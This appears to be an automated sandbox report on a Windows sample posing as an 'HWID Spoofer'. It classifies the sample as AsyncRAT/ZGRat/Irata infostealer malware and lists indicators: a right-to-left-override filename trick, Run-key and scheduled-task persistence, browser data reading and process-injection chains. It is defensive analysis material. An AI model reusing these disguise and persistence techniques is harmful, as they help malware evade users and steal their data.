Malware Analysis Report

2025-01-19 06:05

Sample ID 231214-txwxcagea8
Target HWID Spoofer Resou‮nls..scr
SHA256 8177a82bb9f46bb3a6b01b59eb6fbfc1bfebd9ba5147a5685ee49d6a9aa22002
Tags
upx asyncrat irata zgrat winlogoewg winlozb infostealer persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8177a82bb9f46bb3a6b01b59eb6fbfc1bfebd9ba5147a5685ee49d6a9aa22002

Threat Level: Known bad

The file HWID Spoofer Resou‮nls..scr was found to be: Known bad.

Malicious Activity Summary

upx asyncrat irata zgrat winlogoewg winlozb infostealer persistence rat spyware stealer trojan

Detect ZGRat V1

Irata payload

AsyncRat

ZGRat

Irata

Async RAT payload

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

UPX packed file

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Unsigned PE

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Creates scheduled task(s)

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-14 16:26

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-14 16:26

Reported

2023-12-14 16:29

Platform

win10v2004-20231127-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr" /S

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\F2g3 = "C:\\Users\\Admin\\AppData\\Roaming\\F2g3\\F2g3.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gbn1 = "C:\\Users\\Admin\\AppData\\Roaming\\Gbn1\\Gbn1.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe" C:\Users\Admin\AppData\Local\Temp\b80jkh876yhsdda23kjlkh2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\JFUEOCN2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b80jkhkdsa23kjlkh2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5064 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\System32\sihclient.exe
PID 5064 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\System32\sihclient.exe
PID 1020 wrote to memory of 3912 N/A C:\Windows\System32\sihclient.exe C:\Windows\SysWOW64\tasklist.exe
PID 1020 wrote to memory of 3912 N/A C:\Windows\System32\sihclient.exe C:\Windows\SysWOW64\tasklist.exe
PID 5064 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 3912 wrote to memory of 4824 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3912 wrote to memory of 4824 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5064 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 4512 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 4512 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 3584 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe
PID 3584 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe
PID 5064 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 1064 wrote to memory of 4624 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4944 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1064 wrote to memory of 4624 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4944 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\wLPvLxKrv4.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 3448 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe
PID 2800 wrote to memory of 3448 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe
PID 2672 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 2672 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 5064 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 5064 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\HWID Spoofer Resou‮nls..scr C:\Windows\system32\cmd.exe
PID 1928 wrote to memory of 4600 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 4600 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3448 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3448 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\aVlC89lR9F.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1668 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe
PID 1668 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe
PID 4248 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4248 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\ci2JrYciCk.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe
PID 4824 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe
PID 4824 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe
PID 2980 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2980 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\SysWOW64\cmd.exe
PID 2980 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\SysWOW64\cmd.exe
PID 2980 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\SysWOW64\cmd.exe
PID 1808 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1808 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1808 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2980 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\b8023kjlkh2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
